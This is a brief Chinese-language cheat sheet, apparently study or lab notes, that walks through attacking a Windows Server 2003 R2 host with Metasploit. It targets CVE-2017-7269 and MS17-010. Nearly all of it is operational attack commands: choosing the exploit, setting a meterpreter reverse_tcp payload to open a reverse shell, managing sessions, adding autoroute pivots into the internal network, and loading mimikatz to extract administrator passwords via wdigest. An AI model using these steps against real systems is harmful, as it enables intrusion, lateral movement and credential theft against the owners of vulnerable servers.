目标主机:2003rs2
漏洞:cve-2017-7269 ms17-010
exp搜索 : search cve-xxx
利用:use exp名称
看配置:show options
配置:set 配置名 一个值
设置payload:set payload windows/meterpreter/reverse_tcp(反弹shell)
最终攻击:exploit
把shell放后台:background
交互:session -l 然后 session -i 1
添加路由攻击内网:run autoroute -s 目标网段/24
你还应该去了解meterpreter的功能
例如screenshot 截屏
load mimikatz 然后wdigest 获取管理员密码